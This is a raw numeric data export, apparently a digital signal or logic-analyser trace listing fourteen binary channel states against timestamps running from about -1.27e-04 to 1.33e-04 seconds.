1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2672400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2670000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2667600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2664800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2662400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2657200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2654800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2650000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2647600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2642000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2639600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2634800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2632400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2630000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2627600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2624800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2622400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2619600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2617200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2612400e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2610000e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2604800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2602400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2597200e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2594800e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2590000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2587600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2584800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2582400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2579600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2577200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2574800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2572400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2570000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2567600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2564800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2562400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2559600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2557200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2554800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2552400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2550000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2547600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2544800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2542400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2539600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2537200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2534800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2532400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2530000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2527600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2524800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2522400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2519600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2517200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2514800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2512400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2510000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2507600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2504800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2502400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2499600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2497200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2494800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2492400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2490000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2487600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2484800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2482400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2479600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2477200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2474800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2472400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2470000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2467600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2464800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2462400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2459600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2457200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2454800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2452400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2450000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2447600e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2444800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2442400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2439600e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2437200e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2434800e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2432400e-04 1,1,1,1,0,0,0,0,0,0,0,0,1,0,-1.2430000e-04 1,1,1,1,0,0,0,0,0,0,0,0,0,0,-1.2427600e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,0,-1.2426800e-04 1,1,1,1,0,1,0,0,0,1,0,0,0,1,-1.9600000e-07 0,0,0,0,0,1,0,0,0,1,0,0,0,1,3.9999960e-09 0,0,0,0,1,1,0,0,0,1,0,0,0,1,2.3999996e-08 0,0,0,0,1,1,0,0,0,1,0,1,0,1,5.1999996e-08 0,0,0,0,1,1,0,0,0,1,0,0,0,1,7.9999996e-08 0,0,0,0,1,1,0,0,0,1,0,0,1,1,3.9600000e-07 0,0,0,0,1,1,0,0,0,1,0,0,0,1,4.2000000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.2800000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,1,4.6800000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,1,4.9200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,1,5.2000000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,1,5.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,1,5.7200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,1,5.9600000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,1,6.2000000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.3600000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.6800000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.9200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.2000000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.7200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.9600000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.2000000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,8.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,8.6800000e-07 0,0,0,0,1,1,0,0,0,1,0,0,0,0,8.7600000e-07 0,0,0,0,1,1,0,0,0,1,0,0,1,0,9.2000000e-07 0,0,0,0,1,1,0,0,0,1,0,0,0,0,9.4400000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,9.5200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,9.7200000e-07 0,0,0,0,1,0,0,0,0,0,0,0,0,0,9.9600000e-07 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.0200000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.0440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.0680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.0920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.1680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.1720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.1920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.2680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.2920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.3400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.3640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.3720000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.4200000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.4440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.4680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.4920000e-06 0,0,0,0,1,0,0,0,0,1,0,0,0,0,1.4960000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.5000000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.5400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.5680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.5720000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.6200000e-06 0,0,0,0,1,0,0,0,0,1,0,0,0,0,1.6440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6480000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.6680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.6920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.7640000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.7920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.7960000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.8680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,1.8920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,1.9160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.9240000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,1.9400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,1.9640000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.0200000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.0440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.0680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.0920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.1160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1480000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.1640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.1920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.2160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.2440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.2680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.2920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.3160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.3400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.3640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.3920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.4440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.4680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.4720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.5160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.5400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.5480000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.5920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.6200000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.6440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.6680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.6920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.7160000e-06 0,0,0,0,1,0,0,0,0,1,0,0,0,0,2.7200000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.7240000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.7680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.7920000e-06 0,0,0,0,1,1,0,0,0,0,0,0,0,0,2.7960000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.8000000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,2.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,2.8680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.8720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.8920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,2.9640000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,2.9920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.0160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.0240000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.0680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.0920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.1160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.1640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.1920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.2160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.2440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.2680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.2920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.3640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.3920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.4160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.4440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.4680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.4920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.5160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.5400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.5640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.5920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.6160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.6440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.6920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.7160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7240000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.7640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.7920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.8680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,3.9160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,3.9400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.9480000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,3.9680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,3.9920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.0160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.0440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.0680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.0920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.1160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.1480000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.1920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.2440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.2680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.2720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.2920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.3680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.3920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.4200000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.4440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,4.4680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,4.4920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.5000000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.5160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.5400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.5640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.5920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.6160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.6440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.6680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.6920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.7160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.7400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.7640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.7920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.8160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.8680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.8920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.9160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.9400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,4.9640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,4.9920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.0440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.0680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.0720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.0920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.1160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.1400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.1640000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.1920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.2160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.2440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.2680000e-06 0,0,0,0,1,1,0,0,0,0,0,0,0,0,5.2720000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.2760000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.3160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.3400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.3680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.3920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.4440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.4680000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.4720000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.4920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.5160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.5400000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.5640000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.5920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.6160000e-06 0,0,0,0,1,1,0,0,0,1,0,0,1,0,5.6440000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,5.6680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.6760000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.7160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.7400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.7680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.7920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.8160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.8680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.8920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.9160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.9400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,5.9640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,5.9920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.0160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.0440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.0680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.0920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.1160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.1640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.1920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.2160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.2440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.2680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.2920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.3160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.3400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.3640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.3920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.4160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.4440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.4680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.4920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.5200000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.5400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.5640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.5920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.6160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.6440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.6680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.6920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.7160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.7400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.7640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.7920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.8160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.8440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.8680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.8920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.9160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.9400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,6.9640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,6.9920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.0160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.0440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.0680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.0920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.1160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.1400000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.1640000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.1920000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.2160000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.2440000e-06 0,0,0,0,1,0,0,0,0,0,0,0,1,0,7.2680000e-06 0,0,0,0,1,0,0,0,0,0,0,0,0,0,7.2920000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,0,7.2960000e-06 0,0,0,0,1,1,0,0,0,1,0,0,0,1,1.3170800e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.3189600e-04 1,0,0,0,1,1,0,0,0,1,0,1,0,1,1.3192400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.3194800e-04 1,0,0,0,1,1,0,0,0,1,0,0,1,1,1.3228400e-04 1,0,0,0,1,1,0,0,0,1,0,0,0,1,1.3230800e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3231600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.3233200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3235600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.3238000e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3240400e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.3243200e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3245600e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.3248400e-04 1,0,0,0,1,0,0,0,0,0,0,0,0,1,1.3250800e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,1,1.3253200e-04 1,0,0,0,1,0,0,0,0,0,0,0,1,0,1.3254000e-04 